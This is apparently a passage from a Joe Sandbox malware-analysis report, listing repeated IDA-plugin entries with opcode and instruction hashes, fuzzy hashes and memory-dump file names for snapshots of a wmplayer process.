            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
            • Instruction ID: c6cb39affcd8a52afe491d59e4b0df5159c1b9148d300b37978d95ba03245b83
            • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
            • Instruction Fuzzy Hash: 9CF0C2B3600614ABD324CF8DDC40E57FBFADBC0A80F088168E905CB220EA31DD04CB90
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d788facf7bf7f9fc3fb240d136ad1b0d161697bdc3f534dc3a8e6d6ad1b74213
            • Instruction ID: adc10705f3392c4cbb523ad08529d9e0e8761c95af5390a976b5ac8a9cba885c
            • Opcode Fuzzy Hash: d788facf7bf7f9fc3fb240d136ad1b0d161697bdc3f534dc3a8e6d6ad1b74213
            • Instruction Fuzzy Hash: F4010CB5E0074DAFCB04DFE9D545AAEBBF4EF48304F1080AAA955EB341E674DA00DB91
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a13ad8f3cc0a448f260e25fd485991483baa44de075567051e844a5659dc9d68
            • Instruction ID: a0b8e872d4dee0b8baf5d719cf44393ceb215648917a5e201eedf3b1e18a22fe
            • Opcode Fuzzy Hash: a13ad8f3cc0a448f260e25fd485991483baa44de075567051e844a5659dc9d68
            • Instruction Fuzzy Hash: CBF0C876B10348ABDB04DFFDC805AEEB7B8EF44710F008096E501FB280DAB4D9018792
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c498d5d1fa49c9820167b68c11864f668dd4e776be9d8d5a4d1c42e172b267ec
            • Instruction ID: b17ad0ee4a4d1713b018de4e20155c2d12bea5f02d7c52d068076c90ce0dea34
            • Opcode Fuzzy Hash: c498d5d1fa49c9820167b68c11864f668dd4e776be9d8d5a4d1c42e172b267ec
            • Instruction Fuzzy Hash: D6018F71A00258DFCB00DFA9D841AEEB7F8EF48310F14005AE500EB280D778EA01CB95
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
            • Instruction ID: e5d1f09012d66fa4313cf92b08ec2fdf5c90daa5caa490627033a17b6026e4e4
            • Opcode Fuzzy Hash: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
            • Instruction Fuzzy Hash: 98F06275A11359ABEB14D7FA8940FABBBA99F84618F0885E5B903DB344DA30E940C7D0
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8f57e03f9554dedaa5501d65449fb223a6708ae859e504a278bdbac206c9548d
            • Instruction ID: 8be5c78b239890a80854597e1f7b18bbdc3a361c01ffdf0308051dc7b24675dc
            • Opcode Fuzzy Hash: 8f57e03f9554dedaa5501d65449fb223a6708ae859e504a278bdbac206c9548d
            • Instruction Fuzzy Hash: 02011AB4A00209DFDB04DFA9D545B9EF7F4FF08300F1482A9A519EB381EA74DA408B91
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 423b2fb61ea17f914a6f12181432686f1614bbde9fc3dcdc753582dc4d1a0560
            • Instruction ID: a4009ef82eb35b03f96767027d7ea5ebd7d77acfe32c9b2e7e486fcc6f295dff
            • Opcode Fuzzy Hash: 423b2fb61ea17f914a6f12181432686f1614bbde9fc3dcdc753582dc4d1a0560
            • Instruction Fuzzy Hash: 44F024712043245BF760D6D99C02B763AAAEBC0750F2980EAEB05CF2C0FA70EC81C395
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
            • Instruction ID: d887b10f1b2b6fa9c979053d0fc331dfcfcd96bcc4e643872593e0268f20c85a
            • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
            • Instruction Fuzzy Hash: 37F05435341A1247DB7EFAEF9810E2FE3559FC0A50B4905AC9455CBE40DF70D8018791
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 609f11c4b721b3c11ec2cb299175920e264ac7cc1e26405d47101fab62807d3f
            • Instruction ID: ca695dbb5a8e13d28bbd6fe42c0ab44116540cb035cb986b2af8780b64ffc6d9
            • Opcode Fuzzy Hash: 609f11c4b721b3c11ec2cb299175920e264ac7cc1e26405d47101fab62807d3f
            • Instruction Fuzzy Hash: 4AF03775A0124CEFCB04EFE9D545A9EB7F4EF48304F4080A9B945EB381E674EA01CB56
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c68d662f37bdd7fc91e1c0b28293c28cc9f51470427eaeb3dbe26f398943ffe4
            • Instruction ID: 1ac8ab2c786f6bde5c93fb023f66ef8d84cfc15166e85a7ad9be4f2759058aef
            • Opcode Fuzzy Hash: c68d662f37bdd7fc91e1c0b28293c28cc9f51470427eaeb3dbe26f398943ffe4
            • Instruction Fuzzy Hash: DAF0FA32200744ABC731EB89DC08F9BBBEDEFC4B00F0801A9E942C3090C7A0A948C660
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e9b6f623079c9d7cebec46118b841e7e63f16eec37d4519a78d1f96d57c11395
            • Instruction ID: 5092f83974b846c82fe702aa16cae338330e8b776bb3447f30180f112e6c044f
            • Opcode Fuzzy Hash: e9b6f623079c9d7cebec46118b841e7e63f16eec37d4519a78d1f96d57c11395
            • Instruction Fuzzy Hash: DFF0A7BE41EBD44ECF32FBA86490291AF599757150F1D14C5C6A1DF607C9B488C3C725
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 37117793c08c0434ea8c8fe1d2753ae3e2c09f8a076ab731209bc069471afa16
            • Instruction ID: f7d37a81ecd1a2d6bb42870b64de9fdec2245712d13025ce378b37cd2565dce0
            • Opcode Fuzzy Hash: 37117793c08c0434ea8c8fe1d2753ae3e2c09f8a076ab731209bc069471afa16
            • Instruction Fuzzy Hash: 8EF0B474A1434CDFDB04EBB9D441F5DB7B4EF04300F108094E501EB280DAB4D901CB25
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 655be8409b93bd4b333a4f5b98acfe89a8865a5520c88d99c9e52a9cdb923fb9
            • Instruction ID: bd1298365fa938635cff3dc2e85bfcda3522feeee2576f970e336addee986f81
            • Opcode Fuzzy Hash: 655be8409b93bd4b333a4f5b98acfe89a8865a5520c88d99c9e52a9cdb923fb9
            • Instruction Fuzzy Hash: 7FF0BE78A14308EFDB04EBA9D901EAEB7F8BF04300F044498A441EB2C1EA74D9008B52
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f8df9835616f900361fd307f8253f4b9c0a8139d5beaad27eb12038f15bb37f3
            • Instruction ID: 34aa2c24b242121dab6ebbb2683f0e7fee4112d6493c7397facc138765e2c59a
            • Opcode Fuzzy Hash: f8df9835616f900361fd307f8253f4b9c0a8139d5beaad27eb12038f15bb37f3
            • Instruction Fuzzy Hash: B3F0BE74A14348EFDB04EFB9E901E6EB3B8AF14300F044498A401EB2C0EAB4D900CB56
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 31e0839993288a57cac8383f53f03b8fd6a8f4406e577daa776e8e1afba568c8
            • Instruction ID: eb33f2b586155989a9b2eb6c022b79a4f429f232fbf620d46ace4b7bc60fe61f
            • Opcode Fuzzy Hash: 31e0839993288a57cac8383f53f03b8fd6a8f4406e577daa776e8e1afba568c8
            • Instruction Fuzzy Hash: 84F08274A0424CEFDB04EBB9D945E9EB7B8AF49244F540499A501EB2D0EA74D9008716
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: becc32b973f815557c600ffe94f2dc2c2c36c233b1ad4376d2db4dc7bb90470c
            • Instruction ID: af852c923492f18ace13c5bf36b6c3d6b958bb557a0766985fb4f539f2e2d757
            • Opcode Fuzzy Hash: becc32b973f815557c600ffe94f2dc2c2c36c233b1ad4376d2db4dc7bb90470c
            • Instruction Fuzzy Hash: 8DF08275911A949FEB21D7AEC584B11B7D9AF40674F0D85E1D405CB741CBA8D880C691
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 38c07d58bd1d4a349948ab022b833b5418a5d703a026c0e55ada82bf59bf12a4
            • Instruction ID: c72107c20caf633633d0d7020f782b4b5ccaeaf530709fbd803f86cbc9f2b949
            • Opcode Fuzzy Hash: 38c07d58bd1d4a349948ab022b833b5418a5d703a026c0e55ada82bf59bf12a4
            • Instruction Fuzzy Hash: 94F08274A14348AFDB14EBEDD905E6EB3B8AF44704F050498A901EF2C1EA74D9008756
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 55af38e68440d590ea96d887f073219530ff4ba0359019f8feb860b5861f3e2e
            • Instruction ID: 8a707e462a568a5eff4fc079a8f600d90bc11caa508af1e79c98d0adf802d5cc
            • Opcode Fuzzy Hash: 55af38e68440d590ea96d887f073219530ff4ba0359019f8feb860b5861f3e2e
            • Instruction Fuzzy Hash: C6F08274A1524CEFDB04EBEDD905E6EB3B8EF04304F040499A901EF2C1EA74E900CB56
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
            • Instruction ID: 8793014b1322a47ae8f8d55b291f9f164c8a3f80408503e4d58c12b261459ae5
            • Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
            • Instruction Fuzzy Hash: 06F0A03260461467C220AA4D8C05F5AFBACDBD5B70F10425ABA24DA1D0DA60A911D7D6
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
            • Instruction ID: f05937ef5e747067ffac7c981f8dd09600cfc94ace041bb1866997ca3679e0a8
            • Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
            • Instruction Fuzzy Hash: B2E06D76210204AFE764DB58CD45FA673ACEB40760F180258B115D74D0DAB0AE40CA60
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
            • Instruction ID: bbe2c8b107f27e94284c0d29f3d73aeba8dd42dbb1bf50b23a4651f4d0619076
            • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
            • Instruction Fuzzy Hash: 21E0CD35244318B7DB23AA84CC00F797B55DB417D4F104071FA08DEA50C5B19D91D6D5
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
            • Instruction ID: b25870bfe444b599086fdd8d512d4d6d98eb5999fa18ba7b863a6e29cdbbfa06
            • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
            • Instruction Fuzzy Hash: C6E08C35101B24EEDB31EFA9DC04B527AA6FF84B10F1448E9E0818A4A487B0A8D1DA45
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 83bf41b91c3c3ea5ec8f0b22ec48070caeb9b6cdb87728886319179163633f75
            • Instruction ID: 84c13dc5e1c49a843ec369c64f504abb87daa158796be71e8dcdaa5d47706f7f
            • Opcode Fuzzy Hash: 83bf41b91c3c3ea5ec8f0b22ec48070caeb9b6cdb87728886319179163633f75
            • Instruction Fuzzy Hash: 79F0E534655B84CFE72ADF48C1E2B91B3B9FB99B44F510498D4468FBB1C73AA942CA40
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0ba3ac633ca1edae2769fc017677c1bea51e82d6c4f5c088f2c57ae7e47a933e
            • Instruction ID: f1f328b5338a2be32e7608f6baab5e55622000e0dec375486c370e2377e3e654
            • Opcode Fuzzy Hash: 0ba3ac633ca1edae2769fc017677c1bea51e82d6c4f5c088f2c57ae7e47a933e
            • Instruction Fuzzy Hash: 35E0C2332006546BC321FB9DDD00F4A739EEFA5360F004161F150CFAA0CA60AC00C7D5
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
            • Instruction ID: e6b1063d2d23711ac0d43cbc3afd2ae284f38cfe6b961503cde2a9b3389ba8ba
            • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
            • Instruction Fuzzy Hash: 83D0223231213093CB2CE6D46800F63AD05AF80AA4F0A00AC380AD3800C8088C82C2E0
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
            • Instruction ID: ee96871a9807210c57909f3e0db125cc446681f7a4e7b44fe69db62fd855efb2
            • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
            • Instruction Fuzzy Hash: 5BD09275216A84CFD61BCB99C5A4B16B3A8BB44A48F8904D0E501CBB61D668D940CA00
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
            • Instruction ID: 02adc4d58c16dd82ba9f7b28e4e257c22cca9a0d2903e5ba261f8b78f55aa8ac
            • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
            • Instruction Fuzzy Hash: 68D05E35945AC4CFE727CB08C165B907BF8F749B40F8910D8E04287BA2C37C9984CB10
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
            • Instruction ID: 267725e476671269c30ec3208ccc00b4b1b5956bd80acb6486e1b78b6004f5b2
            • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
            • Instruction Fuzzy Hash: 60D01236100248EFCB01DF85C890DDA772AFBD8710F148019FD190B6108A31ED62DA50
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
